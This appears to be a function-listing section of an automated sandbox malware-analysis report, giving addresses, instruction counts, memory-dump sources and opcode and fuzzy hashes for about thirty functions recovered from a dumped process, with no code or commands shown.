                                                                                                              • Opcode ID: f432910cc448df6af51f7c81042e3aae6ba402afcd962368d69b558baca65143
                                                                                                              • Instruction ID: 45c0a26f255bafebeed7d358aeb7ff98bf5e84d491c2d7915c014db7d149b973
                                                                                                              • Opcode Fuzzy Hash: f432910cc448df6af51f7c81042e3aae6ba402afcd962368d69b558baca65143
                                                                                                              • Instruction Fuzzy Hash: E84106317042049FDB199B78D854AAE7BF6AFCD650F548079E606DB381DF709C12CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01246E44 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26bf40d0dc9a4f935780b43d9033cbf82a85437ed446e9decb0b5cc425502556
                                                                                                              • Instruction ID: 1c63f0901dede5843ab460b3911dd109c2aa3794b2b17b1c40d40eade54287e8
                                                                                                              • Opcode Fuzzy Hash: 26bf40d0dc9a4f935780b43d9033cbf82a85437ed446e9decb0b5cc425502556
                                                                                                              • Instruction Fuzzy Hash: AE41F3317442069FCB0A9F68D454AAF3BF2EF48300F808469FA068B355CB75DD22DB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124C750 Relevance: .1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2476f4abc1d48153cb855a46ae3e8de1a8aafda2328f0ecb37f45e3c23d6190b
                                                                                                              • Instruction ID: 4d75d685ed1c4435db683b42b2d31212b3a6542fa8440f8c0c576074da7f3d05
                                                                                                              • Opcode Fuzzy Hash: 2476f4abc1d48153cb855a46ae3e8de1a8aafda2328f0ecb37f45e3c23d6190b
                                                                                                              • Instruction Fuzzy Hash: 02413775A512059FDB1ADF6CD848A6A7BB5BB48760F104469EA02CB3A1CB70DCA0CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01244508 Relevance: .1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5e86d9d5fab4b185987f9edc01aad4ab5d8774b21453168c18d72e367b4f89f
                                                                                                              • Instruction ID: df86bab5fd335c51068144c8b875f5e344becb75cf69f66c64af2eb25471613c
                                                                                                              • Opcode Fuzzy Hash: a5e86d9d5fab4b185987f9edc01aad4ab5d8774b21453168c18d72e367b4f89f
                                                                                                              • Instruction Fuzzy Hash: 5841D631D116299ADB14EFAADC147DDF7B2BF89304F00C2A5D54877254EB302A9ACF81
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 012497F0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: af659802c14363101874ff1034d73b2789f9c2109cce17dc14979dbfdf56f230
                                                                                                              • Instruction ID: 1ac7a64839c38dbb657a42b6426dfa4950a31200fa02225d881a12ca4d18b7f5
                                                                                                              • Opcode Fuzzy Hash: af659802c14363101874ff1034d73b2789f9c2109cce17dc14979dbfdf56f230
                                                                                                              • Instruction Fuzzy Hash: B121B331B24206CBFF29162D989477B729B9FCC65CF184079E603CB7A5DE69C881D381
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124FCFF Relevance: .1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c39f40271d7df5e3da12daa9940e0fa705c88a30934c1dd6c9d6112d0c165147
                                                                                                              • Instruction ID: d76106f87a44317e36e7725122a7b71bf8e2de187788bf55b9f75be7ceb7f06e
                                                                                                              • Opcode Fuzzy Hash: c39f40271d7df5e3da12daa9940e0fa705c88a30934c1dd6c9d6112d0c165147
                                                                                                              • Instruction Fuzzy Hash: 9B218F70B006008FC3A9EF39D944A2AB7F6EFC9605B10856ED416CB3A6DB71E809CB51
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124529B Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab77f8d2de9f128be851e0d136078b5c92fbdddc1a8713cb9048dbb873b94184
                                                                                                              • Instruction ID: bb68c3d5eacc8924ccaca34937d3b90566c146ad50b063c616ed624f54aa9b32
                                                                                                              • Opcode Fuzzy Hash: ab77f8d2de9f128be851e0d136078b5c92fbdddc1a8713cb9048dbb873b94184
                                                                                                              • Instruction Fuzzy Hash: 23213670B082844FC716977888642BE7FF69FCA200B5984EAC145CB382EF384D078762
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247B58 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8f7b679f400b534e59857707535366757a382a3e1cb8ba21da798011b6148814
                                                                                                              • Instruction ID: 8e31a674b2d22fad0c40c5a13953756ed74bb92781d6da9be159cba550fe88a3
                                                                                                              • Opcode Fuzzy Hash: 8f7b679f400b534e59857707535366757a382a3e1cb8ba21da798011b6148814
                                                                                                              • Instruction Fuzzy Hash: A021D2357106128FC7299B29D454A3FB792EFC8755B0589B9EA16CB355DF70DC018BC0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124CDBB Relevance: .1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d18412f964c9e5908c41890738fffed871d9df1eeba80b6fefe746bf87a0f187
                                                                                                              • Instruction ID: 0263f3430fd68d84b41f4bf19bc95cf494dfb3edf478f97804bd042600a0218d
                                                                                                              • Opcode Fuzzy Hash: d18412f964c9e5908c41890738fffed871d9df1eeba80b6fefe746bf87a0f187
                                                                                                              • Instruction Fuzzy Hash: 5C21FF71F112158FCB19CF6CC8809AEBBB6FF89350B058465E210AB3A2CB349D12CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01248831 Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fb2f869f8780834757e7caaa424625cae0d4438aa826bc396a51ca6a5e776a
                                                                                                              • Instruction ID: 58df72a41bc68025bf8d4df2d7bfb655215c9fdcb8c193d88ffbfd862b56e3a7
                                                                                                              • Opcode Fuzzy Hash: c1fb2f869f8780834757e7caaa424625cae0d4438aa826bc396a51ca6a5e776a
                                                                                                              • Instruction Fuzzy Hash: 1221CD30920209DFDB25CF98D948FAABBF5EF08310F00C46AE2599B652E370ED04CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124B3D9 Relevance: .1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6f5bee85605e3dd9623db407d63537acd1c59cb9ae337f0ccbca2712082c69b9
                                                                                                              • Instruction ID: d7e03779afad29a1877385a36fbe86efb7cd97ebe52d062537f6b50bfe911651
                                                                                                              • Opcode Fuzzy Hash: 6f5bee85605e3dd9623db407d63537acd1c59cb9ae337f0ccbca2712082c69b9
                                                                                                              • Instruction Fuzzy Hash: 85214A30E0124A9FDF09DFA5D590AEEBFB6EF88205F248469E511A7650DB30DA41DF60
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124536B Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24aaac0693850a01f85770aa648fee42b0c4ef69b5bdf97eae8ec7dd89a980df
                                                                                                              • Instruction ID: ed0f5d495b8211fa4968fb06967d63d6f367aff75af6d15662a4d9d470f01040
                                                                                                              • Opcode Fuzzy Hash: 24aaac0693850a01f85770aa648fee42b0c4ef69b5bdf97eae8ec7dd89a980df
                                                                                                              • Instruction Fuzzy Hash: 3111022570D3914FC717173418E806A7FBA9FC661475A44EBD085CF297DE694C078752
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247B56 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0f0ff0c1cd8dfb16d2d371bad7421e999318b6fe7446843e8cb4faca256be33
                                                                                                              • Instruction ID: 1b1ea6239a7dbe3ab048d0cbe5385d45fbc60e5fde43bc6ebe4539a176f5d396
                                                                                                              • Opcode Fuzzy Hash: f0f0ff0c1cd8dfb16d2d371bad7421e999318b6fe7446843e8cb4faca256be33
                                                                                                              • Instruction Fuzzy Hash: 1E11E1317406128FD7199A2AD85493EBB96FFC47A570948B9EB16CB351DF30DC018BD0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124769A Relevance: .1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 79e0964fe1b54ed533dbcbb7c468fe7297f6110b96ecf6cbd1013b71346a3763
                                                                                                              • Instruction ID: 43e254f47fa6da356c855dd2ed9f96e26e5c6d828c8bd176dcf06533768d295d
                                                                                                              • Opcode Fuzzy Hash: 79e0964fe1b54ed533dbcbb7c468fe7297f6110b96ecf6cbd1013b71346a3763
                                                                                                              • Instruction Fuzzy Hash: 27113635B50111CFD71CCE18D048B6ABBA2EB84710F84C029EA298B310C7B0DC00CBD1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01246DE1 Relevance: .1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db587c24a3af882cee9d531a898fb2025dd19e81651137ee2cedf7f87d46f7c2
                                                                                                              • Instruction ID: 20b22a8d26fd2ee4e89a83eb1496993fb52244c00f2364f7528531031c71d260
                                                                                                              • Opcode Fuzzy Hash: db587c24a3af882cee9d531a898fb2025dd19e81651137ee2cedf7f87d46f7c2
                                                                                                              • Instruction Fuzzy Hash: 32110230C18259CBCF18AFB8D9082ECBFB0EB0A315F544655C29177192DF784459C7AA
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124D8C0 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a24757359c1ced1e68feb75cf8c837bdffce8f3e870e6bc483ede42bab63185c
                                                                                                              • Instruction ID: 2d91af08178cf3c40c89c346641d0a0c2f75b377a9117b670376c49c89532d55
                                                                                                              • Opcode Fuzzy Hash: a24757359c1ced1e68feb75cf8c837bdffce8f3e870e6bc483ede42bab63185c
                                                                                                              • Instruction Fuzzy Hash: 00F0E5323842196BEB061659AC25FBF3F6ACBD5B61F048077F705C7280CB60881283D5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124DF1E Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c551277f343eec6bb699f6d974c9e4f6167f6104acf11bb8b0a08966a4a49cca
                                                                                                              • Instruction ID: 9ad35929d7a4eb819548e4c45bfbe4369efd6eab085f86c7c2067da18b03326f
                                                                                                              • Opcode Fuzzy Hash: c551277f343eec6bb699f6d974c9e4f6167f6104acf11bb8b0a08966a4a49cca
                                                                                                              • Instruction Fuzzy Hash: 06E06D35314259BB9F1A1E599820CBF3FABEBE9661B148426FD55C2240CB31C921ABA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124E3D8 Relevance: .0, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b189f62d62ac94fdb3af7236114ae07341c3f1a98ce151507f1f80dbd9793460
                                                                                                              • Instruction ID: 25161a6a60663d3bff5c86044faa2be694b644e454ef51e354a4e7b3284fbe17
                                                                                                              • Opcode Fuzzy Hash: b189f62d62ac94fdb3af7236114ae07341c3f1a98ce151507f1f80dbd9793460
                                                                                                              • Instruction Fuzzy Hash: A5E02636304114976308494B74448A7FBDDFEC93613488032E548C2105D6288A0082E4
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01245370 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d437c03d5b182c20242ce06b5838e0ba0b160a8570e9472818f9c6a63780205
                                                                                                              • Instruction ID: 2b0a07f74decbd2430e991b441c47fad5341a1c2a98580a5050a2a0f004e075a
                                                                                                              • Opcode Fuzzy Hash: 5d437c03d5b182c20242ce06b5838e0ba0b160a8570e9472818f9c6a63780205
                                                                                                              • Instruction Fuzzy Hash: ADD02B323403106BD724267B3C4493BB6DECBC9A68790087EB10EC7351DD75CC0142E0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 012452A8 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cc03db12accbc6e9f0f98ba8a55438d17d486a967e860a0d50c45c0fe7753532
                                                                                                              • Instruction ID: 4982da3dc776bca40bd201f85ec71e35309c7cc4173ddb2d0cbe9c3f5d77f324
                                                                                                              • Opcode Fuzzy Hash: cc03db12accbc6e9f0f98ba8a55438d17d486a967e860a0d50c45c0fe7753532
                                                                                                              • Instruction Fuzzy Hash: 03E06D75A002159F8B14DF69D8049EEBBF5FB88210B14C46AD959D3300E730A905CBA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124FF38 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a0bfbbdf7510247b7e36fc16b160975575d5ecf678b39052890d58951b3def2
                                                                                                              • Instruction ID: 918e4bcf05de281f1fbbc8e6425397976563fe4c8b2a3951e953a9940ebf8290
                                                                                                              • Opcode Fuzzy Hash: 9a0bfbbdf7510247b7e36fc16b160975575d5ecf678b39052890d58951b3def2
                                                                                                              • Instruction Fuzzy Hash: C6D02B3007B204CBD344DBB8D2057BC7BBCBB83209F1592B9D90E031919BF50D05DA41
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124A770 Relevance: .0, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction ID: 27829fde81bd52fc1707b32933eb7d67f4d7e7f77f75dbdeb0ec7d31d714efc9
                                                                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                              • Instruction Fuzzy Hash: 49C08C3329C1282BB23D508F7C41EBBBB8CC3C2AB4A21013BF61EC32019882AC8101F4
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01245F03 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f219c7de017aeb1613207f225142d0a5d298e268f8772454c8a147ce7cffe4e2
                                                                                                              • Instruction ID: e3284a6ba8a5add5349b14f7acde72fb592755d364d17b9065ffb289cbc7370e
                                                                                                              • Opcode Fuzzy Hash: f219c7de017aeb1613207f225142d0a5d298e268f8772454c8a147ce7cffe4e2
                                                                                                              • Instruction Fuzzy Hash: 38D0A93AF102149F9B48AB35B8682ACF363F7C8222704C03AD80AC3204EF304C168B81
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124FF40 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 407f4a575a3efef9e1e6e2f1f96317bdf36c7f29f8b7b19c57f469a3d606fa16
                                                                                                              • Instruction ID: b189da314ffe9aaf9d467297d0f36cc356b48155f897ae4fbe87414166155894
                                                                                                              • Opcode Fuzzy Hash: 407f4a575a3efef9e1e6e2f1f96317bdf36c7f29f8b7b19c57f469a3d606fa16
                                                                                                              • Instruction Fuzzy Hash: 36D0A72047E208D7D714EBA8D506B6D769CBB83605F115154990E131819FF50940D1C5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124CC75 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c114602eeec4d94ffd3e71bbd27fd56b22f9e9e16b2a5071c7fbbb55eaf1ff2f
                                                                                                              • Instruction ID: eb95629d47b9f5a1b232d26e586aac07ca05bc1b65456a604a3ff2bd987158df
                                                                                                              • Opcode Fuzzy Hash: c114602eeec4d94ffd3e71bbd27fd56b22f9e9e16b2a5071c7fbbb55eaf1ff2f
                                                                                                              • Instruction Fuzzy Hash: 9BD0673AB400089FCB049F98E8808DDF776FB98225B44C116EA15A7265C7319921DB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247F9C Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7812564c7723d96a1b3d5e1d33dc714e6389ca092c1b7c4cab093047fe778bc4
                                                                                                              • Instruction ID: f911332abe9f43a423f87cb2bbb6e07544ef447bf3e55c18ff1a320b453cf7f0
                                                                                                              • Opcode Fuzzy Hash: 7812564c7723d96a1b3d5e1d33dc714e6389ca092c1b7c4cab093047fe778bc4
                                                                                                              • Instruction Fuzzy Hash: 73D0C9311A02194F8A44BB64A5926DA33AB9A817493C0992190084BA29EBB5591986D6
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247FA0 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6eaf9677abd6447a36f70d6575a39012b99426bdf22df5f7e77aede393f85a0
                                                                                                              • Instruction ID: 0e21ee25d4a23112c8773eb62a4bc94e3ec9b4318a147f749b469fb5fb495dc1
                                                                                                              • Opcode Fuzzy Hash: e6eaf9677abd6447a36f70d6575a39012b99426bdf22df5f7e77aede393f85a0
                                                                                                              • Instruction Fuzzy Hash: 0FC012301A030D4F8944BB74E54269D336F9B8060D3C08D21900C4FA29EFB4591946D6
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124DEF4 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c1d53fa5164ecaddc65d0656ef3b64cba921d4a708b26499fae2ef7c1a37465
                                                                                                              • Instruction ID: 2c7dc7164ac408de44ae527cbe6ebda68be8cb4e318d47396828f759d5da990b
                                                                                                              • Opcode Fuzzy Hash: 8c1d53fa5164ecaddc65d0656ef3b64cba921d4a708b26499fae2ef7c1a37465
                                                                                                              • Instruction Fuzzy Hash: 7BB01231584300BEEA114E405E06F0E77127790B02F808C00F384150D4C2B14420D712
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%